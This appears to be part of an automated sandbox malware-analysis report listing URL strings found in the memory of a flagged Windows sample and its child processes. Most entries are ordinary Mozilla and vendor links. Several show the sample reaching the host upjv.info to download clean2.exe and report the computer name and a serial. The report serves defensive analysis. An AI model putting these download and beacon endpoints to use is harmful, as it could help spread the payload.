Source: firefox.exe, 00000017.00000002.3337176956.0000025EFE13A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/clea4
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, 00000000.00000003.2897896794.0000000002644000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, 00000000.00000003.2898005545.0000000002663000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, 00000000.00000003.2897825964.0000000002940000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/clean.php?serial=%serial%
Source: firefox.exe, 00000011.00000003.2329912010.000002436336A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3342381495.000001F527850000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3338861198.000001F527550000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3338861198.000001F52755A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3342381495.000001F527854000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3341532191.00000184C7314000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3336842750.00000184C6FAA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3341532191.00000184C7310000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3337847168.0000025EFE1D0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3337176956.0000025EFE130000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3337176956.0000025EFE13A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3337847168.0000025EFE1D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/clean.php?serial=F2LEUD3EOH
Source: firefox.exe, 00000010.00000002.2251461114.000001E8C1440000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/clean.php?serial=F2LEUD3EOH--attempting-deelevation
Source: firefox.exe, 00000016.00000002.3336842750.00000184C6FA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/clean.php?serial=F2LEUD3EOH;%ZQ
Source: firefox.exe, 00000011.00000003.2250734124.000002434D131000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2250734124.000002434D112000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3342381495.000001F527850000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3338861198.000001F527550000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3342381495.000001F527854000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3341532191.00000184C7314000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3341532191.00000184C7310000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3336842750.00000184C6FA0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3337847168.0000025EFE1D0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3337176956.0000025EFE130000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3337847168.0000025EFE1D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/clean.php?serial=F2LEUD3EOHMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:
Source: firefox.exe, 00000011.00000003.2250734124.000002434D112000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/clean.php?serial=F2LEUD3EOHNUMBER_OF_PROCESSORS=2OneDrive=C:
Source: firefox.exe, 00000011.00000003.2326619496.00000243683E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2347364435.00000243683E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2418699275.00000243683E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/clean.php?serial=F2LEUD3EOHen
Source: firefox.exe, 00000011.00000003.2397264757.00000243681D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2471726860.00000243681D4000.00000004.00000800.00020000.00000000.sdmp, places.sqlite-wal.17.dr String found in binary or memory: http://upjv.info/clean/clean.php?serial=F2LEUD3EOHofni.vjpu.d
Source: firefox.exe, 0000000F.00000002.2243026015.00000295A9A50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/clean.php?serial=F2LEUD3EOHy
Source: ariac.exe, 00000004.00000002.2143550967.000000000166D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/clean2.
Source: ariac.exe, 00000004.00000002.2143550967.0000000001660000.00000004.00000020.00020000.00000000.sdmp, ariac.exe, 00000004.00000003.2142678326.000000000318F000.00000004.00000020.00020000.00000000.sdmp, clean.exe, 00000005.00000002.2157879689.000000000073E000.00000004.00000020.00020000.00000000.sdmp, clean.exe, 00000005.00000003.2144398167.00000000024F0000.00000004.00000020.00020000.00000000.sdmp, clean.exe, 00000005.00000002.2157997210.00000000021C0000.00000004.00000020.00020000.00000000.sdmp, clean.exe, 00000005.00000002.2158345471.0000000002630000.00000004.00000020.00020000.00000000.sdmp, 7z.exe, 0000000A.00000002.2210406341.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, 7z.exe, 0000000A.00000002.2210504115.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp, 7z.exe, 0000000A.00000003.2200703191.000000000B381000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000000B.00000003.2223024451.0000000002AE1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000000B.00000002.2224729495.0000000002AB0000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000000B.00000002.2224220104.0000000002A60000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000000B.00000002.2224793423.0000000002AE1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000000B.00000002.2224729495.0000000002AC3000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000000B.00000003.2223024451.0000000002AC0000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2226536723.0000000003130000.00000004.00000020.00020000.00000000.sdmp, ariac.exe, 0000000E.00000002.2238231270.0000000001819000.00000004.00000020.00020000.00000000.sdmp, ariac.exe, 0000000E.00000002.2238569276.0000000001CB4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000F.00000002.2244829208.00000295A9E94000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000F.00000002.2244829208.00000295A9E90000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000F.00000002.2243026015.00000295A9A5A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/clean2.exe
Source: ariac.exe, 00000004.00000003.2142647323.0000000003186000.00000004.00000020.00020000.00000000.sdmp, ariac.exe, 00000004.00000002.2143628501.000000000318D000.00000004.00000020.00020000.00000000.sdmp, ariac.exe, 00000004.00000003.2142663781.000000000318B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/clean2.exe)
Source: ariac.exe, 00000004.00000003.2142647323.0000000003186000.00000004.00000020.00020000.00000000.sdmp, ariac.exe, 00000004.00000002.2143628501.000000000318D000.00000004.00000020.00020000.00000000.sdmp, ariac.exe, 00000004.00000003.2142663781.000000000318B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/clean2.exe2.5:
Source: more.com, 0000000C.00000002.2226559592.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2226536723.0000000003130000.00000004.00000020.00020000.00000000.sdmp, ariac.exe, 0000000E.00000003.2237351744.0000000001B67000.00000004.00000020.00020000.00000000.sdmp, ariac.exe, 0000000E.00000003.2237260409.0000000001B66000.00000004.00000020.00020000.00000000.sdmp, ariac.exe, 0000000E.00000002.2238482972.0000000001B68000.00000004.00000020.00020000.00000000.sdmp, ariac.exe, 0000000E.00000002.2238231270.0000000001810000.00000004.00000020.00020000.00000000.sdmp, ariac.exe, 0000000E.00000002.2238569276.0000000001CB4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000F.00000002.2244829208.00000295A9E94000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000F.00000002.2244829208.00000295A9E90000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000F.00000002.2243026015.00000295A9A50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/clean2.exeCommonProgramFiles=C:
Source: firefox.exe, 0000000F.00000002.2243026015.00000295A9A5A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/clean2.exen
Source: ariac.exe, 00000004.00000002.2142911942.0000000000D00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/clean2.exendows
Source: ariac.exe, 00000004.00000002.2142911942.0000000000D00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/clean2.exeogramFil
Source: ariac.exe, 0000000E.00000003.2237351744.0000000001B67000.00000004.00000020.00020000.00000000.sdmp, ariac.exe, 0000000E.00000002.2238499685.0000000001B6C000.00000004.00000020.00020000.00000000.sdmp, ariac.exe, 0000000E.00000003.2237260409.0000000001B66000.00000004.00000020.00020000.00000000.sdmp, ariac.exe, 0000000E.00000003.2237370516.0000000001B6B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/e
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, 00000000.00000003.2897896794.0000000002644000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, 00000000.00000003.2898005545.0000000002663000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, 00000000.00000003.2897825964.0000000002940000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/entree.php?poste=%computername%
Source: firefox.exe, 0000000F.00000002.2243026015.00000295A9A5A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000F.00000002.2243026015.00000295A9A50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/clean/entree.php?poste=user-PC
Source: firefox.exe, 00000011.00000003.2446484016.000002435E236000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://upjv.info/favicon.ico
Source: places.sqlite-wal.17.dr String found in binary or memory: http://upjv.infod
Source: clean.exe, 00000005.00000003.2156488353.000000000425A000.00000004.00001000.00020000.00000000.sdmp, 7z.exe, 0000000A.00000003.2200703191.000000000B403000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.7-zip.org/
Source: clean.exe, 00000005.00000003.2156488353.000000000425A000.00000004.00001000.00020000.00000000.sdmp, 7z.exe, 0000000A.00000003.2200703191.000000000B381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.7-zip.org/8
Source: clean.exe, 00000005.00000003.2151715946.0000000002E80000.00000004.00001000.00020000.00000000.sdmp, ku-ckb.txt.5.dr String found in binary or memory: http://www.chawg.org
Source: clean.exe, 00000005.00000003.2151715946.0000000002E80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.developershome.com/7-zip/
Source: firefox.exe, 00000011.00000003.2500835652.00000243577D3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2500989572.00000243577AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2503197731.00000243577AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: clean.exe, 00000005.00000003.2151715946.0000000002E80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.gnu.org/
Source: clean.exe, 00000005.00000003.2151715946.0000000002E80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.hot.ee/somberg/7zip.html
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, ariac.exe.2.dr String found in binary or memory: http://www.metalinker.org/
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, ariac.exe.2.dr String found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: firefox.exe, 00000011.00000003.2320326095.000002435C179000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2494367583.000002435E25C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2333638774.000002435E25C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2446484016.000002435E25C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 00000011.00000003.2480393696.00000243654E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2437586421.000002460003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326619496.00000243683B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2347364435.00000243683B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2335110994.000002435C998000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2449291073.000002435DC4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2312295341.000002435DEAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2425087472.000002435DC77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2419420994.00000243654E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2423809946.000002435DEAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2335483499.000002435C958000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2312295341.000002435DEB8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2472115156.00000243654E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000011.00000003.2347364435.00000243683CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326619496.00000243683CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2418699275.00000243683CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulP8c
Source: clean.exe, 00000005.00000003.2151715946.0000000002E80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.oruddho.com
Source: clean.exe, 00000005.00000003.2151715946.0000000002E80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.prizeeinternational.com
Source: clean.exe, 00000005.00000003.2151715946.0000000002E80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.teisininkas.lt/ivairus/7-zip:
Source: firefox.exe, 00000016.00000002.3344074996.00000184C7E4C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2307042533.00000184C7E4C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2305271045.00000184C7E4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.videolan.org/x264.html
Source: firefox.exe, 00000011.00000003.2334658251.000002435D4A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000011.00000003.2334658251.000002435D4A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 00000011.00000003.2350145909.000002435E254000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://MD8.mozilla.org/1/m
Source: clean.exe, 00000005.00000003.2151715946.0000000002FBD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://PortableApps.com/
Source: firefox.exe, 00000011.00000003.2335110994.000002435C97A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2259756769.000002435B71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2260165444.000002435B76B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2260276730.000002435B783000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2259618778.0000024359200000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 00000011.00000003.2491259190.000002435ED70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2421599733.000002435ED70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 00000011.00000003.2495112800.000002435E22C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 00000011.00000003.2444720249.0000024368334000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000011.00000003.2496017415.000002435E06D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/enhancer-for-youtube/
Source: firefox.exe, 00000011.00000003.2496017415.000002435E06D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/facebook-container/
Source: firefox.exe, 00000011.00000003.2496017415.000002435E06D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/reddit-enhancement-suite/
Source: firefox.exe, 00000011.00000003.2496017415.000002435E06D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/to-google-translate/
Source: firefox.exe, 00000011.00000003.2496017415.000002435E06D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/wikipedia-context-menu-search/
Source: firefox.exe, 00000011.00000003.2314766216.0000024368ACD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2444720249.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2315959898.00000243638B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477674869.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2476828386.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326619496.0000024368363000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 00000011.00000003.2333638774.000002435E267000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2446484016.000002435E267000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, ariac.exe.2.dr String found in binary or memory: https://aria2.github.io/
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, ariac.exe.2.dr String found in binary or memory: https://aria2.github.io/Usage:
Source: firefox.exe, 00000011.00000003.2495210278.000002435E21D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000011.00000003.2487200237.0000024365345000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000011.00000003.2470456832.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2491259190.000002435EDDC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2474549451.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2413873750.00000243689D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: firefox.exe, 00000014.00000002.3339591404.000001F5277C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3338371718.00000184C72EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3342601193.0000025EFE703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: firefox.exe, 00000014.00000002.3339591404.000001F5277C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3338371718.00000184C72EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3342601193.0000025EFE703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 00000011.00000003.2455390221.000002436389F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1193802
Source: firefox.exe, 00000011.00000003.2456401062.000002435DD84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1207993
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464experimental-features-devtools-compatibility-pan
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439https://bugzilla.mozilla.org/show_bug.cgi?id=153
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: firefox.exe, 00000011.00000003.2455390221.000002436389F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678448
